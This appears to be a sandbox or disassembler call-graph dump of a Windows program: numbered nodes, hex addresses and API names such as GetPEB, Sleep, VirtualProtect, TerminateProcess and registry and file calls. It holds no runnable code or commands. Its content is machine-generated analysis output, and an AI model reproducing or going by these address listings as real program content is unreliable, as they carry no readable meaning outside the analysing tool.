47 API calls 6 library calls 93299->93308 93309 321145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93299->93309 93310 327c0e 47 API calls __getptd_noexit 93300->93310 93311 327c0e 47 API calls __getptd_noexit 93303->93311 93305->93285 93306->93287 93307->93299 93308->93299 93310->93303 93311->93297 93312->93297 93315 31f4ea __calloc_impl 93313->93315 93314 32395c _W_store_winword 47 API calls 93314->93315 93315->93314 93316 31f50c 93315->93316 93317 31f50e std::exception::exception 93315->93317 93316->93249 93327 326805 RaiseException 93317->93327 93319 31f538 93328 32673b 47 API calls _free 93319->93328 93321 31f54a 93321->93249 93322->93249 93324 30b1a2 _memcpy_s 93323->93324 93325 30b199 93323->93325 93324->93249 93325->93324 93329 30bdfa 93325->93329 93327->93319 93328->93321 93330 30be0a _memcpy_s 93329->93330 93331 30be0d 93329->93331 93330->93324 93332 31f4ea 48 API calls 93331->93332 93333 30be17 93332->93333 93334 31ee75 48 API calls 93333->93334 93334->93330 93336 30b392 93335->93336 93337 30b3c5 _memcpy_s 93335->93337 93336->93337 93338 30b3b8 93336->93338 93339 30b3fd 93336->93339 93337->93261 93337->93337 93345 30bb85 93338->93345 93340 31f4ea 48 API calls 93339->93340 93342 30b407 93340->93342 93343 31f4ea 48 API calls 93342->93343 93343->93337 93344->93262 93346 30bb9b 93345->93346 93349 30bb96 _memcpy_s 93345->93349 93347 371b77 93346->93347 93348 31ee75 48 API calls 93346->93348 93348->93349 93349->93337 93350->93266 93352 30513f __NMSG_WRITE 93351->93352 93353 371b27 93352->93353 93354 305151 93352->93354 93356 306b4a 48 API calls 93353->93356 93355 30bb85 48 API calls 93354->93355 93357 30515e _memcpy_s 93355->93357 93358 371b34 93356->93358 93357->93275 93359 31ee75 48 API calls 93358->93359 93360 371b57 _memcpy_s 93359->93360 93361 d46c50 93375 d448a0 93361->93375 93363 d46d17 93378 d46b40 93363->93378 93377 d44f2b 93375->93377 93381 d47d40 GetPEB 93375->93381 93377->93363 93379 d46b49 Sleep 93378->93379 93380 d46b57 93379->93380 93381->93377 93382 3719dd 93387 304a30 93382->93387 93384 3719f1 93407 320f0a 52 API calls __cinit 93384->93407 93386 3719fb 93388 304a40 __ftell_nolock 93387->93388 93408 30d7f7 93388->93408 93392 304aff 93420 30363c 93392->93420 93395 30518c 48 API calls 93396 304b18 93395->93396 93426 3064cf 93396->93426 93399 30d7f7 48 API calls 93400 304b32 93399->93400 93432 3049fb 93400->93432 93402 304b43 Mailbox 93402->93384 93403 3061a6 48 API calls 93406 304b3d _wcscat Mailbox __NMSG_WRITE 93403->93406 93405 3064cf 48 API calls 93405->93406 93406->93402 93406->93403 93406->93405 93446 30ce19 93406->93446 93407->93386 93409 31f4ea 48 API calls 93408->93409 93410 30d818 93409->93410 93411 31f4ea 48 API calls 93410->93411 93412 304af6 93411->93412 93413 305374 93412->93413 93452 32f8a0 93413->93452 93416 30ce19 48 API calls 93417 3053a7 93416->93417 93454 30660f 93417->93454 93419 3053b1 Mailbox 93419->93392 93421 303649 __ftell_nolock 93420->93421 93465 30366c GetFullPathNameW 93421->93465 93423 30365a 93424 306a63 48 API calls 93423->93424 93425 303669 93424->93425 93425->93395 93427 30651b 93426->93427 93431 3064dd _memcpy_s 93426->93431 93429 31f4ea 48 API calls 93427->93429 93428 31f4ea 48 API calls 93430 304b29 93428->93430 93429->93431 93430->93399 93431->93428 93467 30bcce 93432->93467 93435 3741cc RegQueryValueExW 93437 374246 RegCloseKey 93435->93437 93438 3741e5 93435->93438 93436 304a2b 93436->93406 93439 31f4ea 48 API calls 93438->93439 93440 3741fe 93439->93440 93473 3047b7 93440->93473 93443 374224 93444 306a63 48 API calls 93443->93444 93445 37423b 93444->93445 93445->93437 93447 30ce28 __NMSG_WRITE 93446->93447 93448 31ee75 48 API calls 93447->93448 93449 30ce50 _memcpy_s 93448->93449 93450 31f4ea 48 API calls 93449->93450 93451 30ce66 93450->93451 93451->93406 93453 305381 GetModuleFileNameW 93452->93453 93453->93416 93455 32f8a0 __ftell_nolock 93454->93455 93456 30661c GetFullPathNameW 93455->93456 93457 306a63 48 API calls 93456->93457 93458 306643 93457->93458 93461 306571 93458->93461 93462 30657f 93461->93462 93463 30b18b 48 API calls 93462->93463 93464 30658f 93463->93464 93464->93419 93466 30368a 93465->93466 93466->93423 93468 30bce8 93467->93468 93469 304a0a RegOpenKeyExW 93467->93469 93470 31f4ea 48 API calls 93468->93470 93469->93435 93469->93436 93471 30bcf2 93470->93471 93472 31ee75 48 API calls 93471->93472 93472->93469 93474 31f4ea 48 API calls 93473->93474 93475 3047c9 RegQueryValueExW 93474->93475 93475->93443 93475->93445 93476 379bec 93513 310ae0 _memcpy_s Mailbox 93476->93513 93478 31f4ea 48 API calls 93478->93513 93481 31f4ea 48 API calls 93503 30fec8 93481->93503 93483 310509 93644 34cc5c 86 API calls 4 library calls 93483->93644 93484 31146e 93488 306eed 48 API calls 93484->93488 93487 306eed 48 API calls 93487->93503 93507 30ffe1 Mailbox 93488->93507 93489 37a922 93490 311473 93643 34cc5c 86 API calls 4 library calls 93490->93643 93491 37a246 93495 306eed 48 API calls 93491->93495 93495->93507 93496 37a873 93497 30d7f7 48 API calls 93497->93503 93498 37a30e 93498->93507 93639 3397ed InterlockedDecrement 93498->93639 93499 320f0a 52 API calls __cinit 93499->93503 93500 30ce19 48 API calls 93500->93513 93501 3397ed InterlockedDecrement 93501->93503 93503->93481 93503->93483 93503->93484 93503->93487 93503->93490 93503->93491 93503->93497 93503->93498 93503->93499 93503->93501 93504 37a973 93503->93504 93503->93507 93508 3115b5 93503->93508 93636 311820 331 API calls 2 library calls 93503->93636 93637 311d10 59 API calls Mailbox 93503->93637 93645 34cc5c 86 API calls 4 library calls 93504->93645 93506 37a982 93642 34cc5c 86 API calls 4 library calls 93508->93642 93511 37a706 93640 34cc5c 86 API calls 4 library calls 93511->93640 93513->93478 93513->93500 93513->93503 93513->93507 93513->93511 93514 311526 Mailbox 93513->93514 93515 3397ed InterlockedDecrement 93513->93515 93519 30fe30 93513->93519 93548 34b55b 93513->93548 93552 360d1d 93513->93552 93555 360d09 93513->93555 93558 35f0ac 93513->93558 93590 34a6ef 93513->93590 93596 35e822 93513->93596 93638 35ef61 82 API calls 2 library calls 93513->93638 93641 34cc5c 86 API calls 4 library calls 93514->93641 93515->93513 93520 30fe50 93519->93520 93543 30fe7e 93519->93543 93521 31f4ea 48 API calls 93520->93521 93521->93543 93522 31146e 93523 306eed 48 API calls 93522->93523 93547 30ffe1 93523->93547 93524 30d7f7 48 API calls 93524->93543 93526 310509 93651 34cc5c 86 API calls 4 library calls 93526->93651 93529 31f4ea 48 API calls 93529->93543 93530 37a922 93530->93513 93531 37a246 93536 306eed 48 API calls 93531->93536 93532 311473 93650 34cc5c 86 API calls 4 library calls 93532->93650 93534 306eed 48 API calls 93534->93543 93536->93547 93537 37a873 93537->93513 93538 37a30e 93538->93547 93648 3397ed InterlockedDecrement 93538->93648 93539 320f0a 52 API calls __cinit 93539->93543 93540 3397ed InterlockedDecrement 93540->93543 93542 37a973 93652 34cc5c 86 API calls 4 library calls 93542->93652 93543->93522 93543->93524 93543->93526 93543->93529 93543->93531 93543->93532 93543->93534 93543->93538 93543->93539 93543->93540 93543->93542 93545 3115b5 93543->93545 93543->93547 93646 311820 331 API calls 2 library calls 93543->93646 93647 311d10 59 API calls Mailbox 93543->93647 93649 34cc5c 86 API calls 4 library calls 93545->93649 93546 37a982 93547->93513 93549 34b564 93548->93549 93551 34b569 93548->93551 93653 34a4d5 93549->93653 93551->93513 93675 35f8ae 93552->93675 93554 360d2d 93554->93513 93556 35f8ae 129 API calls 93555->93556 93557 360d19 93556->93557 93557->93513 93559 30d7f7 48 API calls 93558->93559 93560 35f0c0 93559->93560 93561 30d7f7 48 API calls 93560->93561 93562 35f0c8 93561->93562 93563 30d7f7 48 API calls 93562->93563 93564 35f0d0 93563->93564 93565 30936c 81 API calls 93564->93565 93578 35f0de 93565->93578 93566 35f2f9 Mailbox 93566->93513 93567 30c799 48 API calls 93567->93578 93568 306a63 48 API calls 93568->93578 93570 35f2b3 93571 30518c 48 API calls 93570->93571 93573 35f2c0 93571->93573 93572 35f2ce 93574 30518c 48 API calls 93572->93574 93576 30510d 48 API calls 93573->93576 93577 35f2dd 93574->93577 93575 306eed 48 API calls 93575->93578 93581 35f2cc 93576->93581 93582 30510d 48 API calls 93577->93582 93578->93566 93578->93567 93578->93568 93578->93570 93578->93572 93578->93575 93579 30bdfa 48 API calls 93578->93579 93578->93581 93583 30bdfa 48 API calls 93578->93583 93587 30936c 81 API calls 93578->93587 93588 30518c 48 API calls 93578->93588 93589 30510d 48 API calls 93578->93589 93580 35f175 CharUpperBuffW 93579->93580 93814 30d645 93580->93814 93581->93566 93825 306b68 48 API calls 93581->93825 93582->93581 93585 35f23a CharUpperBuffW 93583->93585 93824 31d922 55 API calls 2 library calls 93585->93824 93587->93578 93588->93578 93589->93578 93591 34a6fb 93590->93591 93592 31f4ea 48 API calls 93591->93592 93593 34a709 93592->93593 93594 34a717 93593->93594 93595 30d7f7 48 API calls 93593->93595 93594->93513 93595->93594 93597 35e84e 93596->93597 93598 35e868 93596->93598 93829 34cc5c 86 API calls 4 library calls 93597->93829 93830 35ccdc 48 API calls 93598->93830 93601 35e871 93602 30fe30 330 API calls 93601->93602 93603 35e8cf 93602->93603 93604 35e96a 93603->93604 93606 35e916 93603->93606 93629 35e860 Mailbox 93603->93629 93605 35e978 93604->93605 93608 35e9c7 93604->93608 93849 34a69d 48 API calls 93605->93849 93831 349b72 48 API calls 93606->93831 93611 30936c 81 API calls 93608->93611 93608->93629 93610 35e949 93832 3145e0 93610->93832 93614 35e9e1 93611->93614 93612 35e99b 93850 30bc74 48 API calls 93612->93850 93616 30bdfa 48 API calls 93614->93616 93618 35ea05 CharUpperBuffW 93616->93618 93617 35e9a3 Mailbox 93851 313200 331 API calls 2 library calls 93617->93851 93619 35ea1f 93618->93619 93621 35ea26 93619->93621 93622 35ea72 93619->93622 93852 349b72 48 API calls 93621->93852 93623 30936c 81 API calls 93622->93623 93624 35ea7a 93623->93624 93853 301caa 49 API calls 93624->93853 93627 35ea54 93628 3145e0 330 API calls 93627->93628 93628->93629 93629->93513 93630 35ea84 93630->93629 93631 30936c 81 API calls 93630->93631 93632 35ea9f 93631->93632 93854 30bc74 48 API calls 93632->93854 93634 35eaaf 93855 313200 331 API calls 2 library calls 93634->93855 93636->93503 93637->93503 93638->93513 93639->93507 93640->93514 93641->93507 93642->93507 93643->93496 93644->93489 93645->93506 93646->93543 93647->93543 93648->93547 93649->93547 93650->93537 93651->93530 93652->93546 93654 34a5ee 93653->93654 93655 34a4ec 93653->93655 93654->93551 93657 34a58b 93655->93657 93658 34a5d4 Mailbox 93655->93658 93660 34a4fd 93655->93660 93656 31f4ea 48 API calls 93672 34a54c _memcpy_s Mailbox 93656->93672 93659 31f4ea 48 API calls 93657->93659 93658->93656 93659->93672 93661 31f4ea 48 API calls 93660->93661 93670 34a51a 93660->93670 93661->93670 93662 34a555 93665 31f4ea 48 API calls 93662->93665 93663 34a545 93666 31f4ea 48 API calls 93663->93666 93664 31f4ea 48 API calls 93664->93654 93667 34a55b 93665->93667 93666->93672 93673 349d2d 48 API calls 93667->93673 93669 34a567 93674 31e65e 50 API calls 93669->93674 93670->93662 93670->93663 93670->93672 93672->93664 93673->93669 93674->93672 93711 30936c 93675->93711 93677 35f8ea 93678 35f92c Mailbox 93677->93678 93731 360567 93677->93731 93678->93554 93680 35fb8b 93681 35fcfa 93680->93681 93685 35fb95 93680->93685 93794 360688 89 API calls Mailbox 93681->93794 93684 35fd07 93684->93685 93686 35fd13 93684->93686 93744 35f70a 93685->93744 93686->93678 93687 30936c 81 API calls 93704 35f984 Mailbox 93687->93704 93692 35fbc9 93758 31ed18 93692->93758 93695 35fbe3 93764 34cc5c 86 API calls 4 library calls 93695->93764 93696 35fbfd 93765 31c050 93696->93765 93699 35fbee GetCurrentProcess TerminateProcess 93699->93696 93700 35fc14 93710 35fc3e 93700->93710 93776 311b90 93700->93776 93702 35fd65 93702->93678 93707 35fd7e FreeLibrary 93702->93707 93703 35fc2d 93792 36040f 105 API calls _free 93703->93792 93704->93678 93704->93680 93704->93687 93704->93704 93762 3629e8 48 API calls _memcpy_s 93704->93762 93763 35fda5 60 API calls 2 library calls 93704->93763 93706 311b90 48 API calls 93706->93710 93707->93678 93710->93702 93710->93706 93793 30dcae 50 API calls Mailbox 93710->93793 93795 36040f 105 API calls _free 93710->93795 93712 309384 93711->93712 93729 309380 93711->93729 93713 374cbd __i64tow 93712->93713 93714 374bbf 93712->93714 93715 309398 93712->93715 93722 3093b0 __itow Mailbox _wcscpy 93712->93722 93716 374ca5 93714->93716 93717 374bc8 93714->93717 93796 32172b 80 API calls 3 library calls 93715->93796 93797 32172b 80 API calls 3 library calls 93716->93797 93717->93722 93723 374be7 93717->93723 93719 31f4ea 48 API calls 93721 3093ba 93719->93721 93725 30ce19 48 API calls 93721->93725 93721->93729 93722->93719 93724 31f4ea 48 API calls 93723->93724 93726 374c04 93724->93726 93725->93729 93727 31f4ea 48 API calls 93726->93727 93728 374c2a 93727->93728 93728->93729 93730 30ce19 48 API calls 93728->93730 93729->93677 93730->93729 93732 30bdfa 48 API calls 93731->93732 93733 360582 CharLowerBuffW 93732->93733 93798 341f11 93733->93798 93737 30d7f7 48 API calls 93738 3605bb 93737->93738 93805 3069e9 48 API calls _memcpy_s 93738->93805 93740 3605d2 93741 30b18b 48 API calls 93740->93741 93742 3605de Mailbox 93741->93742 93743 36061a Mailbox 93742->93743 93806 35fda5 60 API calls 2 library calls 93742->93806 93743->93704 93745 35f725 93744->93745 93749 35f77a 93744->93749 93746 31f4ea 48 API calls 93745->93746 93748 35f747 93746->93748 93747 31f4ea 48 API calls 93747->93748 93748->93747 93748->93749 93750 360828 93749->93750 93751 360a53 Mailbox 93750->93751 93752 36084b _strcat _wcscpy __NMSG_WRITE 93750->93752 93751->93692 93752->93751 93753 30cf93 58 API calls 93752->93753 93754 30d286 48 API calls 93752->93754 93755 32395c 47 API calls _W_store_winword 93752->93755 93756 30936c 81 API calls 93752->93756 93809 348035 50 API calls __NMSG_WRITE 93752->93809 93753->93752 93754->93752 93755->93752 93756->93752 93760 31ed2d 93758->93760 93759 31edc5 VirtualProtect 93761 31ed93 93759->93761 93760->93759 93760->93761 93761->93695 93761->93696 93762->93704 93763->93704 93764->93699 93766 31c064 93765->93766 93768 31c069 Mailbox 93765->93768 93810 31c1af 48 API calls 93766->93810 93774 31c077 93768->93774 93811 31c15c 48 API calls 93768->93811 93770 31f4ea 48 API calls 93772 31c108 93770->93772 93771 31c152 93771->93700 93773 31f4ea 48 API calls 93772->93773 93775 31c113 93773->93775 93774->93770 93774->93771 93775->93700 93775->93775 93777 311cf6 93776->93777 93780 311ba2 93776->93780 93777->93703 93778 311bae 93785 311bb9 93778->93785 93813 31c15c 48 API calls 93778->93813 93780->93778 93781 31f4ea 48 API calls 93780->93781 93782 3749c4 93781->93782 93784 31f4ea 48 API calls 93782->93784 93783 311c5d 93783->93703 93791 3749cf 93784->93791 93785->93783 93786 31f4ea 48 API calls 93785->93786 93787 311c9f 93786->93787 93788 311cb2 93787->93788 93812 302925 48 API calls 93787->93812 93788->93703 93790 31f4ea 48 API calls 93790->93791 93791->93778 93791->93790 93792->93710 93793->93710 93794->93684 93795->93710 93796->93722 93797->93722 93799 341f3b __NMSG_WRITE 93798->93799 93800 341f79 93799->93800 93802 341f6f 93799->93802 93803 341ffa 93799->93803 93800->93737 93800->93742 93802->93800 93807 31d37a 60 API calls 93802->93807 93803->93800 93808 31d37a 60 API calls 93803->93808 93805->93740 93806->93743 93807->93802 93808->93803 93809->93752 93810->93768 93811->93774 93812->93788 93813->93785 93815 30d654 93814->93815 93823 30d67e 93814->93823 93816 30d65b 93815->93816 93819 30d6c2 93815->93819 93817 30d6ab 93816->93817 93818 30d666 93816->93818 93817->93823 93827 31dce0 53 API calls 93817->93827 93826 30d9a0 53 API calls __cinit 93818->93826 93819->93817 93828 31dce0 53 API calls 93819->93828 93823->93578 93824->93578 93825->93566 93826->93823 93827->93823 93828->93817 93829->93629 93830->93601 93831->93610 93833 314637 93832->93833 93834 31479f 93832->93834 93835 376e05 93833->93835 93836 314643 93833->93836 93837 30ce19 48 API calls 93834->93837 93838 35e822 331 API calls 93835->93838 93915 314300 331 API calls _memcpy_s 93836->93915 93844 3146e4 Mailbox 93837->93844 93840 376e11 93838->93840 93841 314739 Mailbox 93840->93841 93916 34cc5c 86 API calls 4 library calls 93840->93916 93841->93629 93843 314659 93843->93840 93843->93841 93843->93844 93856 346524 93844->93856 93859 304252 93844->93859 93865 34fa0c 93844->93865 93906 356ff0 93844->93906 93849->93612 93850->93617 93851->93629 93852->93627 93853->93630 93854->93634 93855->93629 93917 346ca9 GetFileAttributesW 93856->93917 93860 30425c 93859->93860 93862 304263 93859->93862 93921 3235e4 93860->93921 93863 304272 93862->93863 93864 304283 FreeLibrary 93862->93864 93863->93841 93864->93863 93866 34fa1c __ftell_nolock 93865->93866 93867 34fa44 93866->93867 94315 30d286 48 API calls 93866->94315 93869 30936c 81 API calls 93867->93869 93870 34fa5e 93869->93870 93871 34fa80 93870->93871 93872 34fb68 93870->93872 93883 34fb92 93870->93883 93873 30936c 81 API calls 93871->93873 94231 3041a9 93872->94231 93877 34fa8c _wcscpy _wcschr 93873->93877 93876 30936c 81 API calls 93879 34fbc7 93876->93879 93885 34fab0 _wcscat _wcscpy 93877->93885 93888 34fade _wcscat 93877->93888 93878 3041a9 136 API calls 93880 34fb8e 93878->93880 94255 321dfc 93879->94255 93880->93876 93880->93883 93882 30936c 81 API calls 93884 34fafc _wcscpy 93882->93884 93883->93841 94316 3472cb GetFileAttributesW 93884->94316 93886 30936c 81 API calls 93885->93886 93886->93888 93888->93882 93889 34fb1c __NMSG_WRITE 93889->93883 93891 30936c 81 API calls 93889->93891 93890 34fbeb _wcscat _wcscpy 93894 30936c 81 API calls 93890->93894 93892 34fb48 93891->93892 94317 3460dd 77 API calls 4 library calls 93892->94317 93896 34fc82 93894->93896 93895 34fb5c 93895->93883 94258 34690b 93896->94258 93898 34fca2 93899 346524 3 API calls 93898->93899 93900 34fcb1 93899->93900 93901 30936c 81 API calls 93900->93901 93904 34fce2 93900->93904 93902 34fccb 93901->93902 94264 34bfa4 93902->94264 93905 304252 84 API calls 93904->93905 93905->93883 93907 30936c 81 API calls 93906->93907 93908 35702a 93907->93908 94911 30b470 93908->94911 93910 35703a 93911 35705f 93910->93911 93912 30fe30 331 API calls 93910->93912 93914 357063 93911->93914 94939 30cdb9 48 API calls 93911->94939 93912->93911 93914->93841 93915->93843 93916->93841 93918 346529 93917->93918 93919 346cc4 FindFirstFileW 93917->93919 93918->93841 93919->93918 93920 346cd9 FindClose 93919->93920 93920->93918 93922 3235f0 __fcloseall 93921->93922 93923 323604 93922->93923 93924 32361c 93922->93924 93956 327c0e 47 API calls __getptd_noexit 93923->93956 93928 323614 __fcloseall 93924->93928 93934 324e1c 93924->93934 93927 323609 93957 326e10 8 API calls __controlfp_s 93927->93957 93928->93862 93935 324e4e EnterCriticalSection 93934->93935 93936 324e2c 93934->93936 93938 32362e 93935->93938 93936->93935 93937 324e34 93936->93937 93959 327cf4 93937->93959 93940 323578 93938->93940 93941 323587 93940->93941 93942 32359b 93940->93942 94044 327c0e 47 API calls __getptd_noexit 93941->94044 93954 323597 93942->93954 94004 322c84 93942->94004 93945 32358c 94045 326e10 8 API calls __controlfp_s 93945->94045 93951 3235b5 94021 32e9d2 93951->94021 93953 3235bb 93953->93954 93955 321c9d _free 47 API calls 93953->93955 93958 323653 LeaveCriticalSection LeaveCriticalSection _fseek 93954->93958 93955->93954 93956->93927 93957->93928 93958->93928 93960 327d05 93959->93960 93961 327d18 EnterCriticalSection 93959->93961 93966 327d7c 93960->93966 93961->93938 93963 327d0b 93963->93961 93990 32115b 47 API calls 3 library calls 93963->93990 93967 327d88 __fcloseall 93966->93967 93968 327d91 93967->93968 93969 327da9 93967->93969 93991 3281c2 47 API calls __NMSG_WRITE 93968->93991 93971 327da7 93969->93971 93976 327e11 __fcloseall 93969->93976 93971->93969 93994 3269d0 47 API calls _W_store_winword 93971->93994 93973 327d96 93992 32821f 47 API calls 6 library calls 93973->93992 93974 327dbd 93977 327dd3 93974->93977 93978 327dc4 93974->93978 93976->93963 93981 327cf4 __lock 46 API calls 93977->93981 93995 327c0e 47 API calls __getptd_noexit 93978->93995 93979 327d9d 93993 321145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93979->93993 93984 327dda 93981->93984 93983 327dc9 93983->93976 93985 327de9 InitializeCriticalSectionAndSpinCount 93984->93985 93986 327dfe 93984->93986 93987 327e04 93985->93987 93996 321c9d 93986->93996 94002 327e1a LeaveCriticalSection _doexit 93987->94002 93991->93973 93992->93979 93994->93974 93995->93983 93997 321ccf _free 93996->93997 93998 321ca6 RtlFreeHeap 93996->93998 93997->93987 93998->93997 93999 321cbb 93998->93999 94003 327c0e 47 API calls __getptd_noexit 93999->94003 94001 321cc1 GetLastError 94001->93997 94002->93976 94003->94001 94005 322c97 94004->94005 94009 322cbb 94004->94009 94006 322933 __stbuf 47 API calls 94005->94006 94005->94009 94007 322cb4 94006->94007 94046 32af61 94007->94046 94010 32eb36 94009->94010 94011 3235af 94010->94011 94012 32eb43 94010->94012 94014 322933 94011->94014 94012->94011 94013 321c9d _free 47 API calls 94012->94013 94013->94011 94015 322952 94014->94015 94016 32293d 94014->94016 94015->93951 94187 327c0e 47 API calls __getptd_noexit 94016->94187 94018 322942 94188 326e10 8 API calls __controlfp_s 94018->94188 94020 32294d 94020->93951 94022 32e9de __fcloseall 94021->94022 94023 32e9e6 94022->94023 94028 32e9fe 94022->94028 94204 327bda 47 API calls __getptd_noexit 94023->94204 94025 32ea7b 94208 327bda 47 API calls __getptd_noexit 94025->94208 94026 32e9eb 94205 327c0e 47 API calls __getptd_noexit 94026->94205 94028->94025 94029 32ea28 94028->94029 94032 32a8ed ___lock_fhandle 49 API calls 94029->94032 94031 32ea80 94209 327c0e 47 API calls __getptd_noexit 94031->94209 94035 32ea2e 94032->94035 94034 32ea88 94210 326e10 8 API calls __controlfp_s 94034->94210 94037 32ea41 94035->94037 94038 32ea4c 94035->94038 94189 32ea9c 94037->94189 94206 327c0e 47 API calls __getptd_noexit 94038->94206 94040 32e9f3 __fcloseall 94040->93953 94042 32ea47 94207 32ea73 LeaveCriticalSection __unlock_fhandle 94042->94207 94044->93945 94045->93954 94047 32af6d __fcloseall 94046->94047 94048 32af75 94047->94048 94049 32af8d 94047->94049 94144 327bda 47 API calls __getptd_noexit 94048->94144 94051 32b022 94049->94051 94056 32afbf 94049->94056 94149 327bda 47 API calls __getptd_noexit 94051->94149 94052 32af7a 94145 327c0e 47 API calls __getptd_noexit 94052->94145 94055 32b027 94150 327c0e 47 API calls __getptd_noexit 94055->94150 94071 32a8ed 94056->94071 94059 32b02f 94151 326e10 8 API calls __controlfp_s 94059->94151 94060 32afc5 94062 32afeb 94060->94062 94063 32afd8 94060->94063 94146 327c0e 47 API calls __getptd_noexit 94062->94146 94080 32b043 94063->94080 94064 32af82 __fcloseall 94064->94009 94067 32afe4 94148 32b01a LeaveCriticalSection __unlock_fhandle 94067->94148 94068 32aff0 94147 327bda 47 API calls __getptd_noexit 94068->94147 94072 32a8f9 __fcloseall 94071->94072 94073 32a946 EnterCriticalSection 94072->94073 94074 327cf4 __lock 47 API calls 94072->94074 94075 32a96c __fcloseall 94073->94075 94076 32a91d 94074->94076 94075->94060 94077 32a93a 94076->94077 94078 32a928 InitializeCriticalSectionAndSpinCount 94076->94078 94152 32a970 LeaveCriticalSection _doexit 94077->94152 94078->94077 94081 32b050 __ftell_nolock 94080->94081 94082 32b0ac 94081->94082 94083 32b08d 94081->94083 94113 32b082 94081->94113 94087 32b105 94082->94087 94088 32b0e9 94082->94088 94162 327bda 47 API calls __getptd_noexit 94083->94162 94086 32b092 94163 327c0e 47 API calls __getptd_noexit 94086->94163 94097 32b11c 94087->94097 94168 32f82f 49 API calls 3 library calls 94087->94168 94165 327bda 47 API calls __getptd_noexit 94088->94165 94089 32b86b 94089->94067 94092 32b099 94164 326e10 8 API calls __controlfp_s 94092->94164 94095 32b0ee 94166 327c0e 47 API calls __getptd_noexit 94095->94166 94153 333bf2 94097->94153 94098 32b12a 94100 32b44b 94098->94100 94169 327a0d 47 API calls 2 library calls 94098->94169 94102 32b463 94100->94102 94103 32b7b8 WriteFile 94100->94103 94101 32b0f5 94167 326e10 8 API calls __controlfp_s 94101->94167 94107 32b55a 94102->94107 94111 32b479 94102->94111 94105 32b7e1 GetLastError 94103->94105 94115 32b410 94103->94115 94105->94115 94118 32b663 94107->94118 94121 32b565 94107->94121 94108 32b150 GetConsoleMode 94108->94100 94110 32b189 94108->94110 94109 32b81b 94109->94113 94174 327c0e 47 API calls __getptd_noexit 94109->94174 94110->94100 94116 32b199 GetConsoleCP 94110->94116 94111->94109 94112 32b4e9 WriteFile 94111->94112 94112->94105 94117 32b526 94112->94117 94176 32a70c 94113->94176 94115->94109 94115->94113 94120 32b7f7 94115->94120 94116->94115 94137 32b1c2 94116->94137 94117->94111 94117->94115 94129 32b555 94117->94129 94118->94109 94122 32b6d8 WideCharToMultiByte 94118->94122 94119 32b843 94175 327bda 47 API calls __getptd_noexit 94119->94175 94124 32b812 94120->94124 94125 32b7fe 94120->94125 94121->94109 94126 32b5de WriteFile 94121->94126 94122->94105 94136 32b71f 94122->94136 94173 327bed 47 API calls 3 library calls 94124->94173 94171 327c0e 47 API calls __getptd_noexit 94125->94171 94126->94105 94128 32b62d 94126->94128 94128->94115 94128->94121 94128->94129 94129->94115 94131 32b727 WriteFile 94134 32b77a GetLastError 94131->94134 94131->94136 94132 32b803 94172 327bda 47 API calls __getptd_noexit 94132->94172 94134->94136 94136->94115 94136->94118 94136->94129 94136->94131 94137->94115 94138 32b28f WideCharToMultiByte 94137->94138 94139 3340f7 59 API calls __chsize_nolock 94137->94139 94140 32b2f6 94137->94140 94170 321688 57 API calls __isleadbyte_l 94137->94170 94138->94115 94141 32b2ca WriteFile 94138->94141 94139->94137 94140->94105 94140->94115 94140->94137 94142 335884 WriteConsoleW CreateFileW __chsize_nolock 94140->94142 94143 32b321 WriteFile 94140->94143 94141->94105 94141->94140 94142->94140 94143->94105 94143->94140 94144->94052 94145->94064 94146->94068 94147->94067 94148->94064 94149->94055 94150->94059 94151->94064 94152->94073 94154 333c0a 94153->94154 94155 333bfd 94153->94155 94157 333c16 94154->94157 94184 327c0e 47 API calls __getptd_noexit 94154->94184 94183 327c0e 47 API calls __getptd_noexit 94155->94183 94157->94098 94159 333c02 94159->94098 94160 333c37 94185 326e10 8 API calls __controlfp_s 94160->94185 94162->94086 94163->94092 94164->94113 94165->94095 94166->94101 94167->94113 94168->94097 94169->94108 94170->94137 94171->94132 94172->94113 94173->94113 94174->94119 94175->94113 94177 32a716 IsProcessorFeaturePresent 94176->94177 94178 32a714 94176->94178 94180 3337b0 94177->94180 94178->94089 94186 33375f 5 API calls 2 library calls 94180->94186 94182 333893 94182->94089 94183->94159 94184->94160 94185->94159 94186->94182 94187->94018 94188->94020 94211 32aba4 94189->94211 94191 32eb00 94224 32ab1e 48 API calls 2 library calls 94191->94224 94193 32eaaa 94193->94191 94194 32eade 94193->94194 94196 32aba4 __lseeki64_nolock 47 API calls 94193->94196 94194->94191 94197 32aba4 __lseeki64_nolock 47 API calls 94194->94197 94195 32eb08 94198 32eb2a 94195->94198 94225 327bed 47 API calls 3 library calls 94195->94225 94199 32ead5 94196->94199 94200 32eaea CloseHandle 94197->94200 94198->94042 94203 32aba4 __lseeki64_nolock 47 API calls 94199->94203 94200->94191 94201 32eaf6 GetLastError 94200->94201 94201->94191 94203->94194 94204->94026 94205->94040 94206->94042 94207->94040 94208->94031 94209->94034 94210->94040 94212 32abaf 94211->94212 94215 32abc4 94211->94215 94226 327bda 47 API calls __getptd_noexit 94212->94226 94214 32abb4 94227 327c0e 47 API calls __getptd_noexit 94214->94227 94218 32abe9 94215->94218 94228 327bda 47 API calls __getptd_noexit 94215->94228 94218->94193 94219 32abf3 94229 327c0e 47 API calls __getptd_noexit 94219->94229 94221 32abbc 94221->94193 94222 32abfb 94230 326e10 8 API calls __controlfp_s 94222->94230 94224->94195 94225->94198 94226->94214 94227->94221 94228->94219 94229->94222 94230->94221 94318 304214 94231->94318 94236 374f73 94239 304252 84 API calls 94236->94239 94237 3041d4 LoadLibraryExW 94328 304291 94237->94328 94241 374f7a 94239->94241 94243 304291 3 API calls 94241->94243 94245 374f82 94243->94245 94244 3041fb 94244->94245 94246 304207 94244->94246 94354 3044ed 94245->94354 94247 304252 84 API calls 94246->94247 94250 30420c 94247->94250 94250->93878 94250->93880 94252 374fa9 94362 304950 94252->94362 94771 321e46 94255->94771 94259 346918 _wcschr __ftell_nolock 94258->94259 94260 321dfc __wsplitpath 47 API calls 94259->94260 94263 34692e _wcscat _wcscpy 94259->94263 94261 34695d 94260->94261 94262 321dfc __wsplitpath 47 API calls 94261->94262 94262->94263 94263->93898 94265 34bfb1 __ftell_nolock 94264->94265 94266 31f4ea 48 API calls 94265->94266 94267 34c00e 94266->94267 94268 3047b7 48 API calls 94267->94268 94269 34c018 94268->94269 94270 34bdb4 GetSystemTimeAsFileTime 94269->94270 94271 34c023 94270->94271 94272 304517 83 API calls 94271->94272 94273 34c036 _wcscmp 94272->94273 94274 34c107 94273->94274 94275 34c05a 94273->94275 94276 34c56d 94 API calls 94274->94276 94814 34c56d 94275->94814 94292 34c0d3 _wcscat 